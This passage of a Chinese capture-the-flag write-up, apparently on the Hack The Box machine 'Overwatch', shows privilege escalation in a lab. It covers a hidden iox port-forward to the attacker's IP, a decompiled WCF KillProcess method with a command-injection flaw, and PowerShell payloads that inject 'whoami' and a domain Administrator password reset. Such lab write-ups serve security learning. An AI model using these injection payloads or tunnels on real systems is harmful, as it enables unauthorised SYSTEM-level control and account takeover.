\/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>.NET\u7a0b\u5e8f\u9006\u5411\u5206\u6790<\/h2>\n<p>\u767b\u5f55\u7cfb\u7edf\u540e\uff0c\u8fdb\u884c\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\uff0c\u4f46\u672a\u53d1\u73b0\u6709\u6548\u4fe1\u606f\u3002\u56de\u5fc6\u6574\u4e2a\u653b\u51fb\u8fc7\u7a0b\uff0c\u60f3\u5230\u5728<code>overwatch.exe.config<\/code>\u914d\u7f6e\u6587\u4ef6\u4e2d\u53d1\u73b0\u7684<code>MonitoringService<\/code>\u670d\u52a1\u540d\uff0c\u4ee5\u53ca\u8be5\u670d\u52a1\u76d1\u542c\u7684<code>8000<\/code>\u53f7\u672c\u5730\u7aef\u53e3\uff0c\u51b3\u5b9a\u4e0a\u4f20<code>iox<\/code>\u4ee3\u7406\u8f6c\u53d1\u5de5\u5177\uff0c\u5c06\u9776\u673a\u73af\u56de\u5730\u5740\u7684<code>8000<\/code>\u7aef\u53e3\u8f6c\u53d1\u81f3\u672c\u5730\u8fdb\u884c\u679a\u4e3e\u3002<a href=\"https:\/\/github.com\/EddieIvan01\/iox\" target=\"_blank\"  rel=\"nofollow\" >GitHub - EddieIvan01\/iox: Tool for port forwarding &amp; intranet proxy<\/a><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769843595584-921395ba-8ddc-47af-b88d-5d0e5604cbe3.png\" alt=\"\" \/><\/p>\n<pre><code class=\"language-shell\"># On local machine\n.\/iox fwd -l *2222 -l 8000 -k 314159\n# On target machine\nStart-Process -FilePath .\/iox.exe -ArgumentList \"fwd -r 127.0.0.1:8000 -r *10.10.16.149:2222 -k 314159\" -WindowStyle Hidden<\/code><\/pre>\n<p>\u8f6c\u53d1\u5b8c\u6210\u540e\uff0c\u8bbf\u95ee<code>http:\/\/127.0.0.1:8000\/MonitorService<\/code>\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769844120417-91c59f0f-c195-482b-b6cc-b8c530248216.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5\u9875\u9762\u5b9e\u9645\u4e3a<code>WCF<\/code>\u670d\u52a1\u7684\u4e3b\u9875\u9762\uff0c\u8fd8\u63d0\u4f9b\u4e86<code>WCF<\/code>\u5ba2\u6237\u7aef\u914d\u7f6e\u6587\u4ef6\u7684\u4e0b\u8f7d\u5730\u5740\uff1a<code>http:\/\/overwatch.htb:8000\/MonitorService?wsdl<\/code>\uff0c\u4e0d\u96be\u770b\u51fa<code>overwatch.exe<\/code>\u5b9e\u9645\u4e0a\u4e3a\u6b63\u5728\u8fd0\u884c\u7684<code>WCF<\/code>\u670d\u52a1\u7aef\u7a0b\u5e8f\u3002<\/p>\n<blockquote><p>Windows\u901a\u8baf\u5f00\u53d1\u5e73\u53f0\uff08Windows Communication Foundation\uff0c\u7b80\u79f0WCF\uff09\u662f\u7531\u5fae\u8f6f\u5f00\u53d1\u7684\u5e94\u7528\u7a0b\u5e8f\u6846\u67b6\uff0c\u4f5c\u4e3a.NET Framework 3.0\u7684\u7ec4\u6210\u90e8\u5206\u5f15\u5165\u3002\u8be5\u6846\u67b6\u6574\u5408\u4e86.NET Remoting\u3001WebService\u3001Socket\u7b49\u901a\u4fe1\u673a\u5236\uff0c\u652f\u6301HTTP\u3001TCP\u3001Named Pipe\u7b49\u591a\u79cd\u534f\u8bae\uff0c\u901a\u8fc7\u6570\u636e\u5951\u7ea6\u3001\u670d\u52a1\u5951\u7ea6\u3001\u64cd\u4f5c\u5951\u7ea6\u53ca\u6d88\u606f\u5951\u7ea6\u89c4\u8303\u901a\u4fe1\u8fc7\u7a0b\u3002\u5176\u6838\u5fc3\u529f\u80fd\u6db5\u76d6\u7f51\u7edc\u670d\u52a1\u534f\u8bae\u3001\u4e1a\u52a1\u670d\u52a1\u534f\u8bae\u3001\u6570\u636e\u7c7b\u578b\u58f0\u660e\u548c\u4f20\u8f93\u5b89\u5168\u5b9a\u4e49\uff0c\u65e8\u5728\u4e3a\u5206\u5e03\u5f0f\u5e94\u7528\u63d0\u4f9b\u6807\u51c6\u5316\u5f00\u53d1\u65b9\u6848\u3002<\/p><\/blockquote>\n<p>\u76f4\u63a5\u4f7f\u7528<code>Jetbrains dotPeek<\/code>\u5de5\u5177\u5bf9<code>overwatch.exe<\/code>\u8fdb\u884c\u53cd\u7f16\u8bd1\uff0c\u67e5\u770b\u5e76\u5206\u6790\u5176\u6e90\u4ee3\u7801\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769844979613-d1b0e8ef-c3a0-4e76-a20a-ca85b931eb3a.png\" alt=\"\" \/><\/p>\n<p>\u6253\u5f00<code>MonitoringService<\/code>\u7c7b\u6e90\u4ee3\u7801\u7ffb\u9605\uff0c\u53d1\u73b0\u5b58\u5728\u4e09\u4e2a<code>WCF<\/code>\u65b9\u6cd5\uff1a<code>StartMonitroing<\/code>\u3001<code>StopMonitoring<\/code>\u548c<code>KillProcess<\/code>\u3002\u5176\u4e2d<code>KillProcess<\/code>\u65b9\u6cd5\u6e90\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-csharp\">public string KillProcess(string processName)\n{\n    string scriptContents = $\"Stop-Process -Name {processName} -Force\";\n    try\n    {\n        using (Runspace runspace = RunspaceFactory.CreateRunspace())\n        {\n            runspace.Open();\n            using (Pipeline pipeline = runspace.CreatePipeline())\n            {\n                pipeline.Commands.AddScript(scriptContents);\n                pipeline.Commands.Add(\"Out-String\");\n                Collection&lt;PSObject&gt; collection = pipeline.Invoke();\n                runspace.Close();\n                StringBuilder stringBuilder = new StringBuilder();\n                foreach (PSObject psObject in collection)\n                    stringBuilder.AppendLine(psObject.ToString());\n                return stringBuilder.ToString();\n            }\n        }\n    }\n    catch (Exception ex)\n    {\n        return \"Error: \" + ex.Message;\n    }\n}<\/code><\/pre>\n<p>\u53d1\u73b0\u5728\u8be5\u65b9\u6cd5\u7684\u4f5c\u7528\u4e3a\u63a5\u6536\u4f20\u5165\u7684\u670d\u52a1\u540d\u5b57\u7b26\u4e32<code>processName<\/code>\uff0c\u968f\u540e\u5c06\u5176\u62fc\u63a5\u5230\u7cfb\u7edf\u547d\u4ee4\u5b57\u7b26\u4e32\u53d8\u91cf<code>scriptContents<\/code>\u4e2d\uff0c\u901a\u8fc7\u8c03\u7528\u547d\u4ee4\u6267\u884c\u65b9\u6cd5\u6267\u884c<code>Stop-Process<\/code>\u547d\u4ee4\u7684\u65b9\u5f0f\u5f3a\u5236\u7ed3\u675f\u4efb\u610f\u8fdb\u7a0b\uff0c\u4f46\u7531\u4e8e\u65b9\u6cd5\u672a\u5bf9\u4f20\u5165\u7684<code>processName<\/code>\u53d8\u91cf\u8fdb\u884c\u4efb\u4f55\u5408\u6cd5\u6027\u6821\u9a8c\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528<code>;<\/code>\u4f5c\u4e3a\u547d\u4ee4\u5206\u9694\u7b26\uff0c\u7531\u6b64\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002<\/p>\n<h2>WCF\u670d\u52a1\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u5728\u9006\u5411\u5206\u6790<code>WCF<\/code>\u670d\u52a1\u7aef\u7a0b\u5e8f<code>overwatch.exe<\/code>\u7684\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u5df2\u7ecf\u53d1\u73b0<code>WCF<\/code>\u65b9\u6cd5<code>killProcess<\/code>\u5b58\u5728\u4efb\u610f\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u73b0\u5728\u8fdb\u884c\u5229\u7528\u3002<\/p>\n<p>\u9996\u5148\u767b\u5f55<code>WinRM<\/code>\uff0c\u4f7f\u7528<code>New-WebServiceProxy<\/code>\u547d\u4ee4\u5bfc\u5165\u5728\u7ebf<code>WSDL<\/code>\u914d\u7f6e\uff0c\u65b0\u5efa\u4e00\u4e2a<code>WCF<\/code>\u5ba2\u6237\u7aef\uff0c\u968f\u540e\u8c03\u7528\u5ba2\u6237\u7aef\u5bf9\u8c61\u7684<code>killProcess<\/code>\u65b9\u6cd5\u5373\u53ef\u3002\u9996\u5148\u6211\u4eec\u6267\u884c<code>whoami \/all<\/code>\u65b9\u6cd5\uff0c\u67e5\u770b\u8fd0\u884c\u8be5\u670d\u52a1\u7684\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-powershell\">$wcfClient = New-WebServiceProxy -Uri \"http:\/\/overwatch.htb:8000\/MonitorService?wsdl\" -UseDefaultCredential\n$wcfClient.killProcess(\"a;whoami \/all;echo \")<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769845930834-1d71e5c1-f84e-43e3-a42d-0bfc8694bc22.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>MonitorService<\/code>\u670d\u52a1\u7684\u8fd0\u884c\u7528\u6237\u4e3a<code>SYSTEM<\/code>\uff0c\u76f4\u63a5\u4fee\u6539\u57df\u7ba1\u7406\u5458\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-powershell\">$wcfClient.killProcess(\"a;net user Administrator Asd310056 \/domain;echo \")<\/code><\/pre>\n<p>\u968f\u540e\u76f4\u63a5\u4f7f\u7528<code>Remmina<\/code>\u5de5\u5177\u767b\u5f55\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769846105877-5d8d00d6-dede-4ff8-a737-3236c5ca07a7.png\" alt=\"\" \/><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769846203790-0fcf6ba7-def6-45cf-993d-9c3d64ee5daa.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.129.12.119\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.129.12.119 ( &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[13],"tags":[],"class_list":["post-386","post","type-post","status-publish","format-standard","hentry","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/386","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=386"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/386\/revisions"}],"predecessor-version":[{"id":387,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/386\/revisions\/387"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=386"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=386"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=386"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}